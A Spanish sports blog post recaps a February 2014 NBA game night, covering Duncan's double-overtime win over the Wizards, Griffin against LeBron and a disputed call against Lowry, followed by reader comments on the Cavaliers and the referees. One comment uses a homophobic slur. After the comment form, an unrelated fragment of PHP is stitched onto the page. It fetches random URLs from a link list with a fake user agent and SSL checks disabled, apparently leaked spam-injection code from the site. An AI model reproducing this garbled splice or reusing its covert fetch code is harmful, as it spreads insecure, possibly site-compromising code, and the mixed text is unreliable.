La Crónica: Eterno Tim Duncan

06 de February de 2014 por Simon

Jornada cargada de partidos pero con pocos cambios en la clasificación. Entre lo más destacado de la jornada se encuentran las dos prórrogas del Spurs-Wizards, el partidazo -sin premio- de Blake Griffin y el triple doble de Steve Blake.

Las previas del Wizards-Spurs explicaban  que los capitalinos no vencían a San Antonio desde 2005 lo que significaba una racha de 15 derrotas consecutivas. Como si tuvieran este hecho en mente, Wall y sus compañeros saltaron a la pista convencidos de que era el momento de romper tan funesta estadística. En la primera parte consiguieron ventajas que rondaban los 15 puntos y tras la lesión de Tony Parker, que se retiró del partido durante el descanso, todo parecía de cara para los Wizards. Pero no contaban con el gran Tim Duncan que mantuvo a su equipo a flote para que pudiera remontar la desventaja y llevarse el partido tras dos prórrogas (125-118). Menos problemas tuvieron los Thunder para deshacerse de los Wolves, que a pesar de jugar sin Love ni Brewer compitieron hasta el último cuarto (97-106). El tercero en discordia en el Oeste, los Blazers, se llevaron la victoria del Madison con Batum y Matthews como hombres más destacados (94-90). 

Había varios partidazos programados para la jornada de ayer pero sin duda el rey de la jornada era la visita de los Heat al Staples para enfrentarse a los Clippers. Blake Griffin y Lebron James ofrecieron un gran espectáculo jugando ambos uno de sus mejores partidos esta temporada. Sin embargo, a pesar de que el resultado apunta a partido super igualado la realidad es que los Heat estuvieron siempre por delante y sólo un gran último cuarto de los hombres de Doc Rivers consiguió apretar el marcador en los instantes finales. Ray Allen, que ya es el 18º jugador que más partidos ha disputado en la historia de la NBA,  mató cualquier opción de remontada con un triple desde la esquina (116-112). Otro de los duelos de la jornada era el enfrentamiento a cara de perro entre los Mavericks y los Grizzlies. El partido se mantuvo igualado hasta el final del tercer cuarto e inicios del último momento en el que Dallas consiguió por fin dspagarse para llevarse una victoria que puede ser vital en el futuro (110-96). Otro equipo que puede verse envuelto en esta pelea por la octava plaza son los Suns que ayer perdieron en la difícil cancha que es el Toyota Center de Houston. Cuando Dwight Howard y Terrence Jones tienen su noche los Rockets son un equipo simplemente imparable. A pesar hacer un buen partido, y contar con un Goran Dragic mayúsculo, no tuvieron ninguna opción ante la apisonadora de la pareja interior de los Rockets (108-122).

La visita de los Raptors a los Kings fue el partido elegido por Adam Silver para hacer su primera aparición desde que sustituyó oficialmente a David Stern como comisionado de la NBA. Una gran primera parte de los Kings dejó el partido prácticamente sentenciado ya que los locales alcanzaron ventajas cercanas a los 20 puntos pero los Raptors no se rindieron y en un gran último cuarto consiguieron apretar el marcador. A falta de 25 segundos Kyle Lowry anotó un triple que ponía a Raptors a sólo 3 puntos pero los árbitros señalaron falta en ataque del mismo Lowry en el lanzamiento y anularon la canasta para sorpresa e indignación de los visitantes. Después de esta jugada los Kings solo tuvieron que anotar sus tiros libres y certificar la victoria (101-109). Otra sorpresa de la jornada fue el triunfo de los Pelicans sobre los Hawks. Un monumental Anthony Davis, bien secundado por Brian Roberts, guió a su equipo a la victoria con un gran último cuarto en el que remontaron para llevarse el partido (100-105). En Cleveland vivimos un partido surrealista. Los Lakers anotaron 18 triples (récord de la franquicia) y consiguieron 70 puntos en la 1ª parte (mejor marca de la temporada). Se lesionaron Nick Young y Jordan Farmar (que reaparecía), eliminaron a Chris Kaman por faltas y cuando Robert Sacre cometió la 6ª con casi 4 minutos todavía en el marcador, se mantuvo sobre la pista porque los californianos no tenían ningún recambio y no se puede jugar con menos de 5 hombres. De todas maneras, la ventaja de la 1ª parte era tan amplia y la ineptitud de Irving, Deng y compañía tan mayúscula que los Lakers ganaron cómodamente (119-108).

En el resto de partidos de la jornada, Boston se impuso a Philadelphia con Jeff Green como protagonista y Rajon Rondo rozando el triple-doble (114-108); Denver no tuvo problemas para deshacerse de los Bucks (100-110) y los Magic derrotaron a los decepcionantes, una vez más, Detroit Pistons (98-112).

PREMIOS

MVP: Lebron James lideró a los Heat en un gran partido global. Sus 31 puntos, 8 rebotes, 12 asistencias y 3 rebotes son solo una muestra de que estuvo en todas partes.Un viejo rockero, Tim Duncan, también anotó 31 puntos y los complementó con 11 rebotes, 5 asistencias, 2 robos y 3 tapones. Su nivel fue de otro tiempo desde la lesión de Tony Parker  hasta su eliminación por faltas.

Rookie: No defenderá mucho Ryan Kelly pero no es nada manco en ataque. Sus 26 puntos de anoche suponen su tope personal. Por su parte, Victor Oladipo anotó 20 puntos con un 8 de 10 en TC y además completó una completa hoja estadística. 14 puntos y 8 rebotes para Anthony Bennett. Viendo el nivel de los Cavs bien podrían centrarse en darle minutos y facilidades.

Sorpresa: Este es el Larry Sanders que esperábamos este año. 25 puntos y 15 rebotes, nada más y nada menos. DeMarre Carroll fue el mejor de los Hawks con 22 puntos, 7 rebotes, 4 asistencias y 3 robos.

Decepción: Luol Deng parece haberse contagiado de la mediocridad que impera en Cleveland. Ante los Lakers se quedó en sólo 3 puntos tras anotar 1 de sus 10 lanzamientos. Mal día también para Michael Carter-Williams. El rookie de los Sixers falló 11 de sus 16 lanzamientos y perdió 4 balones, uno particularmente importante en los instantes finales.

Esfuerzo en vano: La mejor actuación del día se queda sin recompensa. Blake Griffin se fue a los 43 puntos, 15 rebotes y 6 asistencias pero al final tuvo que hincar la rodilla ante King James.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Pues Irving es una de las grandes decepciones de la temporada. Un jugador de su talento debería tener a los Cavs mucho mas arriba en una conferencia tan pobre. Y además como premio ha sido votado para titular del AllStar.

      Citar

  2. Esteban dice:
    #2

    Viva_Dirk:
    Pues Irving es una de las grandes decepciones de la temporada. Un jugador de su talento debería tener a los Cavs mucho mas arriba en una conferencia tan pobre. Y además como premio ha sido votado para titular del AllStar.

    me da que mucho tiene q ver Brown, todos los Cavs son peores este año que el año pasado y eso que estan muy reforzados, por algo sera

      Citar

  3. Denise dice:
    #3

    Viva_Dirk:
    Pues Irving es una de las grandes decepciones de la temporada. Un jugador de su talento debería tener a los Cavs mucho mas arriba en una conferencia tan pobre. Y además como premio ha sido votado para titular del AllStar.

    Y tendrán la suerte de todos los años de pillar el pick 1 del próximo Draft. Que asco de franquicia.

      Citar

  4. txusma dice:
    #4

    Denise: Y tendrán la suerte de todos los años de pillar el pick 1 del próximo Draft. Que asco de franquicia.

    Elección q suelen cagar: Irving, Tristan Thompson, Dion Waiters, Andrew Benett en años consecutivos… Mejor no comprobar el equipazo que podrían tener ahora mismo.

      Citar

  5. Esteban dice:
    #5

    txusma: Elección q suelen cagar: Irving, Tristan Thompson, Dion Waiters, Andrew Benett en años consecutivos… Mejor no comprobar el equipazo que podrían tener ahora mismo.

    perdon?

    el pick de Irvinf fue cagada? mira sus compañeros del draft, nunca mejor elegido un pick 1, el unico jugador del draft que ha jugado un all-star y ha promediado 20 puntos por juego, de hecho, el unico que no es mediocre

    Thompson y Waiters, no los hubiera elegido, pero al menos demuestran no ser malos individualmente, aunque a la vez esta claro que no son los jugadores que necesitaban para armar un buen equipo

    lo de BENNETT, bueno, ayer jugo otro buen partido, aunque los 14 o 15 puntos y los 6 o 7 rebotes parecen ser su techo maximo, al menos este año

    por otra parte la eleccion de Tyler ZELLER la veo muy acertada

    tampoco para matar a los podres cavs

      Citar

  6. txusma dice:
    #6

    Hombre, claro que la de Irving no fue cagada. Hablaba de las otras 3, principalmente.

      Citar

  7. Denise dice:
    #7

    Lillard va al concurso de mates, y Ross, Wall y George están invitados. Ah!, yo quería ver a Oladipo.

    Estoy viendo en diferido un trozo del Magic-Pistons y es lamentable el juego de los de Michigan con ese Jennings en modo lanzapiedras on, y el pasotismo defensivo que tiene el equipo. Joder, con bicharracos como Smith, Monroe y Drummond no puedes permitir tantos puntos en la pintura y que te ganen tantos rebotes. A Monroe habría que darle una paliza para espabilarlo un poco, vaya picha fria.
    Y aprovecho la ocasión para profesar mi más sincero amor por Kyle O’Quinn, clásico tio tosco pero que debes tener en tu plantilla para hacer el trabajo sucio y ganarte partidos desde el lado menos glamorouso del basket.

      Citar

  8. rumbero dice:
    #8

    txusma: Elección q suelen cagar: Irving, Tristan Thompson, Dion Waiters, Andrew Benett en años consecutivos… Mejor no comprobar el equipazo que podrían tener ahora mismo.

    A Chris Grant (GM de los Cavs) lo acaban de despedir. No debería ser el último

      Citar

  9. Esteban dice:
    #9

    El problema mayor de los clippers no son solo sus selecciones altas, sino en los años en los que cayeron, el pick de thomps es discutible pero detras de el tampoco hay jugadores tanto mejores, un draft horrible

    Mientras q el de bennett, solo es discutible por oladipo, dentro de los que se m?encionaban como posibles picks, no hay nadie escatable

    Haber tenido el ojo de selccionar a MCW o a Burke en el pick uno, teniendo a irving, seria ser brujo

      Citar

  10. Sancho88 dice:
    #10

    Esteban, Waiters es un chupón sin más, Zeller le falta carácter y Tristan Thompson es un hacenúmeros que valdría si el equipo fuese sólido, pero Bennett es mil veces mejor que él y deberían darle la oportunidad de demostrarlo. Parece que Mike Brown va a ser el primero en estar fuera. Y sobre Kyrie Irving coincido con que está siendo una decepción este año, no un pick 1 malo, ojo, ni mucho menos. Irving es otro chupón que podría codearse con Chris Paul si buscase más a sus compañeros, pero no le da la gana. Una pena.

    Este equipo no debería estar así. Supongo que Lionel Hollins y George Karl serán los principales candidatos a ocupar el banquillo de los Cavs. Este año está tardando en haber destituciones, pero con la excusa del tanking muchos entrenadores mantienen su puesto, ya que no importa que pierdan. Pero en el caso de Cavs hay demasiado horno en el pan para andarse con gilipoyeces a estas alturas. Tener tantas grandes elecciones y marchar en tierra de nadie en el Este es un delito. Deberían buscar traspasar su pick de este año + Waiters por Evan Turner, al que también quieren los Bobcats. Un quinteto Irving-Turner-Deng-Thompson-Varejao, con Jack-Miles-Gee-Clark-Bennett-Zeller tendría que estar en playoffs sí o sí. A ver qué pasa. Si han echado al GM lo más normal sería echar al entrenador, ya que el nuevo General Manager tendrá que empezar tomando decisiones importantes, y la más importante es saber quién quieren que dirija el elquipo. A ver qué pasa porque yo creo que en el parón del All-Star se van a tomar decisiones ahí.

    Y lo del triple de Lowry es un robo a mano armada para Toronto. Se habrían puesto a 3 con 20 pico segundos por jugar después de hacer una defensa brutal que les permitió bajar de 20 la diferencia. Deberían haber dado marcha atrás con su decisión. Espero como todos vosotros que haya sanción fuerte para esos árbitros que le han jodido una posible victoria a Raptors. Nadie sabe quién hubiera ganado, seguramente Kings pues en el carrusel de tiros libres es muy difícil perder cuando tienes una ventaja de 3 puntos, pero la verdad es que se cargaron el partido por cabezonería. Ni instant replay ni nada, se quisieron hacer los chulos con el jefe en la grada, y lo único que hicieron fue el ridículo. Silver ya tiene tela para cortar, bajarles del pedestal a los árbitros. Stern los ha convertido en intocables, y eso no debe ser así. Pitan técnicas por cualquier cosa, los jugadores no pueden decir ni pío, no pueden ni protestar, ni gesticular ni nada. Como dirían Barkley y Payton, se está amariconando mucho esta liga. No queremos volver a los 80 y los 90, pero lo de ahora es de los Teletubbis

      Citar

  11. Sancho88 dice:
    #11

    Y Duncan tiene 40 tacos o 18? Vaya manera de correr a la contra el tío, de finalizar, de moverse… Lo dicho, un Dios comparable únicamente a Kareem Abdul-Jabbar, por eso Tim pasará a la historia como el mejor 4 y Jabbar es el mejor 5 (a mi juicio). Dos jugadores irrepetibles.

      Citar

  12. Denise dice:
    #12

    Sancho88:
    Esteban, Waiters es un chupón sin más, Zeller le falta carácter y Tristan Thompson es un hacenúmeros que valdría si el equipo fuese sólido, pero Bennett es mil veces mejor que él y deberían darle la oportunidad de demostrarlo. Parece que Mike Brown va a ser el primero en estar fuera. Y sobre Kyrie Irving coincido con que está siendo una decepción este año, no un pick 1 malo, ojo, ni mucho menos. Irving es otro chupón que podría codearse con Chris Paul si buscase más a sus compañeros, pero no le da la gana. Una pena.

    A mi Thompson me parece un gran jugador y dudo mucho que Bennet llegue algun día a demostrar el nivel de Tristan.
    Y Zeller creo que fue drafteado por los Mavs y traspasado a Cleveland sin llegar a jugar para los texanos.

      Citar

  13. Esteban dice:
    #13

    Zeller no recuerdo ni quiero buscar, pero es un pick 20 o parecido, mucho mas no se puede pdir a esa altura, incluso es demasaido bueno para ser elegido tan bajo

    Thompson tiene el problema de que en la NBA el puesto del 4 es de anotador y definidor, y el es un 4 defensivo y reboteador, si midiera algunos centimetros mas podria ser centro

      Citar

  14. Viva_Dirk dice:
    #14

    Esteban:
    El problema mayor de los clippers no son solo sus selecciones altas, sino en los años en los que cayeron, el pick de thomps es discutible pero detras de el tampoco hay jugadores tanto mejores, un draft horrible

    Hombre detrás de Thompson fueron elegidos Kemba Walker, Klay Thompson, Markieff Morris, Kawhi Leonard, Vucevic o Faried.

    Además lo horrible es lo mal que gestionan la evolución de los jugadores, deberian haberles dado un porrón de minutos a todos ellos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>